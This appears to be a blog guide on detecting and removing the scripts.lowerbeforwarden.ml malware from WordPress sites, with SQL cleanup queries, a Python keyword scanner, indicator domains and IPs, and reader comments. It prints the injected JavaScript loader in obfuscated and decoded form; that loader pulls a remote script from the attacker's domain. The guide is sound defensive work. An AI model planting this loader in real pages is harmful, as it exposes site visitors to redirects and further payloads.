scripts.lowerbeforwarden.ml is a newer version of the js.donatelloflowfirstly.ga virus, and it is infecting all those sites that have not been able to fix the back door yet.

js.donatelloflowfirstly.ga is a very severe malware-injection type of virus, and thousands of WordPress sites are infected with it.

This guide is now old, check out a new one here

How to Check For scripts.lowerbeforwarden.ml

How to Check For location.lowerbeforwarden.ml

If your site redirects visitors to some ugly-looking web pages, this virus may exist on your site.

You might find the following scripts embedded everywhere in your site:

<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>

or

<script src='https://location.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>

Yes, that is one of the scripts that this virus inserts.

And here is the encoded (character-code obfuscated) version of the scripts.lowerbeforwarden.ml virus script:

<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script></head>

Here is the decoded script:

<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.src = 'https://scripts.lowerbeforwarden.ml/src.js';elem.appendAfter(document.getElementsByTagName('script')[0]);elem.appendAfter(document.getElementsByTagName('head')[0]);document.getElementsByTagName('head')[0].appendChild(elem);})();</script></head>

How to clean scripts.lowerbeforwarden.ml virus

Create a backup of your whole site, including the database, before changing any code.

1. First, delete the _a, _f, _2, etc. files from your site's home directory.

2. Delete any malicious code you spot in the mu-plugins folder.

Check all the files under wp-content/mu-plugins for anything suspicious and delete it. While working for a user on cleaning this vulnerability, I saw that he was using nulled WordPress plugins. Because of additional functionality added to the nulled plugin, the rms-script-ini.php function creates another file under wp-content/mu-plugins, i.e. rms_unique_wp_mu_pl_fl_nm.php, which creates a communication channel between the hacker's site and your website. By completing this step you will have cleaned up the remaining traces of the vulnerability.

Go to phpMyAdmin. Click on Database and run the following SQL query to remove the scripts from the wp_posts table:

UPDATE wp_posts SET post_content = (REPLACE(post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", ""));

or

UPDATE wp_posts SET post_content = (REPLACE(post_content, "<script src='https://location.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", ""));

If you want any more help removing this virus, you can mail me at [email protected]

 Clean Core Files

There are many ways to clean your WordPress files. Here is my way:

1): Zip all the site files and download the zip file to your desktop.

2): Unzip the files to a folder, "txnkaro" as an example.

3): Go to the folder wp-content/plugins and delete all plugins, then put clean copies of the plugins into the folder. Do the same with the theme files: delete all themes and replace them with clean themes.

4): Now run the VSCode editor. You can download it at https://code.visualstudio.com/ and install it.

5): Open the txnkaro (example) folder in VSCode, then click Edit > Search in the files to search for the keywords: donatelloflowfirstly, lowerbeforwarden. Only a few files should be found, since we have deleted all cached files and replaced all themes and plugins. Edit those files if you know how to, or just replace them with clean files.

6): All files should be clean now. Delete your whole site and upload this clean backup to the site folder. Your site should be OK.
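The keyword search in step 5 does not match the character-code-encoded loader shown earlier, because the hostname never appears in it as plain text. The following added example (not part of the original guide) decodes String.fromCharCode(...) calls before looking for the same two keywords; the function names and the list of scanned file extensions are assumptions.

```python
import re
import sys
from pathlib import Path

# Keywords the guide's step 5 searches for.
KEYWORDS = ("donatelloflowfirstly", "lowerbeforwarden")
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
SCANNED_SUFFIXES = {".php", ".js", ".html", ".htm"}  # assumed list, extend as needed

# Constructed sample in the page's obfuscated style, encoded here from the hostname.
SAMPLE_OBFUSCATED = "elem.src = String.fromCharCode(%s);" % ",".join(
    str(ord(ch)) for ch in "https://scripts.lowerbeforwarden.ml/src.js")

def decode_charcodes(text):
    """Replace every String.fromCharCode(...) call with the string it builds."""
    def repl(match):
        try:
            codes = [int(c) for c in match.group(1).split(",") if c.strip()]
            return "'" + "".join(map(chr, codes)) + "'"
        except (ValueError, OverflowError):
            return match.group(0)  # malformed or out-of-range: keep as-is
    return CHARCODE_RE.sub(repl, text)

def scan_text(text):
    """Return [(keyword, 'plain' | 'charcode')] for each keyword found."""
    plain, decoded = text.lower(), decode_charcodes(text).lower()
    hits = []
    for kw in KEYWORDS:
        if kw in plain:
            hits.append((kw, "plain"))
        elif kw in decoded:  # only visible after decoding the char codes
            hits.append((kw, "charcode"))
    return hits

def scan_tree(root):
    """Scan web-served text files under root; return {relative path: hits}."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCANNED_SUFFIXES:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings

if __name__ == "__main__":
    print(scan_text(SAMPLE_OBFUSCATED))  # demo on the constructed sample
    for root in sys.argv[1:]:  # e.g. the unzipped backup folder
        for name, hits in scan_tree(root).items():
            print(name, hits)
```

Run it against the unzipped backup folder from step 2; a hit marked "charcode" is a file the plain-text editor search would have missed.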

There is another way to clean the files if you can log in to the site admin panel. Install the Wordfence plugin and scan the whole site. Wordfence will find the injected files; just edit them or replace them with clean files.

Now clear your website cache files and your browser cache and check; the virus should be gone.

If you are looking for a professional who can help remove viruses permanently from your website, check out my gig on Fiverr.

List of  malicious URLs:

Other malicious domains within the same network:
tomog.pro, mysbitl.com, nwliko.com, tbtrck.com, bestprize-places-here1.life, mobile-global-apps-store.life, mobile-global-apps-store.life, beawickcampaing.ga, bluemountainreserve.ga, blackwaterforllows.ga, check-you-robot.site, superinterestinginfo.info,
allow-space.com, allowandgo.com, check-you-robot.online, check-you-robot.site, checkandgo.info, clckask.club, clickjump.biz, clickpush.biz, traffsend.me, reclick.club, pumesh.xyz, clicktms.club, wwopenclick.club.
clickgate.biz, clickworker.me, wwclickads.club, wwclicktm.club, wwclicktm.club, clickworker.me

Malicious IPs: 45.9.148.126, 157.245.79.75.

2 Comments

  • Msolis81 says:

    Thanks for the info. One thing this virus does is that wp-login.php and wp-admin show a 500 error. I got my website fixed but I can’t log in.

  • Sean Higgins says:

    Thank you for this article. It was very helpful in resolving my issue with scripts.lowerbeforwarden.ml. I had to check my wp_posts to get the syntax of the script as my script was slightly different than your version.
